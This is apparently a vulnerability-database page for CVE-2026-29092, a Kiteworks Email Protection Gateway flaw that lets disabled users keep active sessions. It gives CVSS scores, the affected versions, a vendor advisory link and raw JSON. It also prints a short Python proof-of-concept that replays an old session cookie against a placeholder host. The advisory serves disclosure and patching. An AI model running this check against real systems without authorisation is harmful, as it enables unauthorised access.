Security Vulnerability Report
CVE-2026-29092 CVSS 4.9 MEDIUM

CVE-2026-29092

Published: 2026-03-25 17:16:57
Last Modified: 2026-03-27 19:01:20

Description

Kiteworks is a private data network (PDN). Prior to version 9.2.1, a vulnerability in Kiteworks Email Protection Gateway session management allows blocked users to maintain active sessions after their account is disabled. This could allow unauthorized access to continue until the session naturally expires. Upgrade Kiteworks to version 9.2.1 or later to receive a patch.

CVSS Details

CVSS Score: 4.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N (the "Secondary" metric in the raw JSON below)

The "Primary" metric in the raw JSON below rates the same issue 7.5 HIGH with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N; the two vectors differ only in Privileges Required (PR:H versus PR:N). Both agree on Integrity: HIGH, Confidentiality: NONE, Availability: NONE.
Weakness: CWE-613 (Insufficient Session Expiration)

Configurations (Affected Products)

cpe:2.3:a:accellion:kiteworks:*:*:*:*:*:*:*:* - VULNERABLE
Kiteworks < 9.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL configuration
target_url = "https://kiteworks-instance.com/api/user/profile"

# Simulate a session token from a user that has just been disabled
# In a real scenario, this cookie is obtained before the disable action
cookies = {
    "session_id": "compromised_or_legacy_session_token"
}
headers = {
    "User-Agent": "CVE-2026-29092-POC-Scanner"
}

try:
    # Send request using the old session token
    response = requests.get(target_url, cookies=cookies, headers=headers, timeout=10)

    # Check if the server still accepts the session despite the account being disabled
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed: Server accepted the session token for a disabled account.")
        print("[+] Response Data:", response.text[:200])
    elif response.status_code in (401, 403):
        print("[-] Session properly invalidated or account disabled.")
    else:
        print(f"[?] Unexpected status code: {response.status_code}")
except Exception as e:
    print(f"Error connecting to target: {e}")
```

References

https://github.com/kiteworks/security-advisories/security/advisories/GHSA-92w7-fpjr-wpxc (Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-29092", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:57.330", "lastModified": "2026-03-27T19:01:19.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kiteworks is a private data network (PDN). Prior to version 9.2.1, a vulnerability in Kiteworks Email Protection Gateway session management allows blocked users to maintain active sessions after their account is disabled. This could allow unauthorized access to continue until the session naturally expires. Upgrade Kiteworks to version 9.2.1 or later to receive a patch."}, {"lang": "es", "value": "Kiteworks es una red de datos privada (PDN). Antes de la versión 9.2.1, una vulnerabilidad en la gestión de sesiones de Kiteworks Email Protection Gateway permite a los usuarios bloqueados mantener sesiones activas después de que su cuenta sea deshabilitada. Esto podría permitir que el acceso no autorizado continúe hasta que la sesión expire naturalmente. Actualice Kiteworks a la versión 9.2.1 o posterior para recibir un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:accellion:kiteworks:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.2.1", "matchCriteriaId": "30A78D6E-2376-4B2C-B4AD-499D1DF88E34"}]}]}], "references": [{"url": "https://github.com/kiteworks/security-advisories/security/advisories/GHSA-92w7-fpjr-wpxc", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```